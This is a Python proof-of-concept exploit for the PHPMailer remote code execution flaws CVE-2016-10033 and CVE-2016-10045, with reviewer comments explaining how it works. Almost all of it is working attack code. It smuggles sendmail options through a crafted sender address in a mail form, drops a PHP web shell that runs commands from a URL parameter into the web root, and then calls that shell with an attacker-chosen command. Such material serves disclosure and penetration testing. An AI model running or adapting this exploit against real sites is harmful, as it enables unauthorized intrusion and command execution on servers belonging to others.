#!/usr/bin/env python3
# Banner text. NOTE(review): neither `intro` nor `usage` is printed anywhere in
# this script - they are documentation carried in code, not runtime output.
intro = """
PHPMailer RCE PoC Exploits
PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
+
PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
(the bypass of the first patch for CVE-2016-10033)
Discovered and Coded by:
Dawid Golunski
@dawid_golunski
https://legalhackers.com
Re-coded by:
Andrea Cappa
@zi0Black (Twitter,Telegram,GitHub)
https://zioblack.xyz (italian only)
"""
# Advisory / PoC-video links and the disclaimer (also never displayed at runtime).
usage = """
Usage:
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
PoC Video:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Disclaimer:
For testing purposes only. Do no harm.
"""
import time
import urllib.request, urllib.parse, urllib.error
import urllib.request, urllib.error, urllib.parse
import socket
import sys
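RW_DIR = "/var/www/"  # where the shell lands; must be writable by the web-server user AND be the served document root for stage two to reach it
url = ''  # Set destination URL here (the form whose `email` field PHPMailer uses as the sender), or pass it as argv[1]
# Choose/uncomment one of the payloads:
# PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)
# The escaped quote ends the quoted local-part early so that `-oQ/tmp/` (queue dir) and
# `-X<file>` are passed to sendmail as options; per the linked advisory `-X` logs the
# whole transcript, message body included, which is how RCE_PHP_CODE ends up in RW_DIR.
payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR
# Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)
#payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR
######################################
# PHP code to be saved into the backdoor php file on the target in RW_DIR
# WARNING: this is an unauthenticated web shell - anyone who can reach /phpcode.php can run
# commands as the web-server user. Delete it from the target as soon as the test is over.
RCE_PHP_CODE = "<?php system($_GET['c']);?>"
PHP_SETTINGS = "phpcode.php?c="
PHP_PAYLOAD = ""  # command for stage two (argv[2] overrides); empty only checks that the shell answers
# The target form is assumed to expose exactly these field names; adjust to the real form.
post_fields = {'email': payload, 'subject': 'x', 'text': RCE_PHP_CODE}


def build_shell_url(target_url, command):
    """Return the stage-two URL that makes the dropped shell execute *command*.

    The shell is written to RW_DIR/phpcode.php, so it is addressed from the site
    root of *target_url* rather than appended to the form's own path
    (``url + "/phpcode.php"`` only worked when ``url`` already was the root).
    *command* is percent-encoded so spaces and shell metacharacters survive the
    query string instead of being truncated by the server.
    """
    site_root = urllib.parse.urljoin(target_url, "/")
    return site_root + PHP_SETTINGS + urllib.parse.quote(command, safe="")


def run(target_url, command):
    """Drop the shell through the mail form (stage one) and call it (stage two).

    Exits with a usage message when no target is configured (the original let
    urlopen('') fail with an opaque ValueError), and with a diagnostic when
    stage two gets an HTTP error instead of the shell - the original announced
    success after stage one regardless of outcome. A non-2xx answer to stage
    one is only a warning: the form may report a send failure even though
    sendmail already wrote the log file. urllib.error.URLError propagates for
    connection-level failures.
    """
    if not target_url:
        sys.exit("usage: %s <form-url> [command]   (or set `url` in the script)" % sys.argv[0])
    data = urllib.parse.urlencode(post_fields).encode("utf-8")
    try:
        with urllib.request.urlopen(urllib.request.Request(target_url, data)) as response:
            response.read()
    except urllib.error.HTTPError as err:
        print("First stage: form answered HTTP %s %s - the shell may still have been written, "
              "trying stage two anyway" % (err.code, err.reason))
    else:
        print("First stage completed! Php shell should now be at %sphpcode.php :)" % RW_DIR)
    shell_url = build_shell_url(target_url, command)
    try:
        with urllib.request.urlopen(urllib.request.Request(shell_url)) as response:
            output = response.read()
    except urllib.error.HTTPError as err:
        sys.exit("Second stage failed (%s %s) at %s: target may be patched, RW_DIR may not be "
                 "the document root, or the form field names differ" % (err.code, err.reason, shell_url))
    print("Payload executed: " + command)
    print(output.decode("utf-8", "replace"))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else url
    command = sys.argv[2] if len(sys.argv) > 2 else PHP_PAYLOAD
    run(target, command)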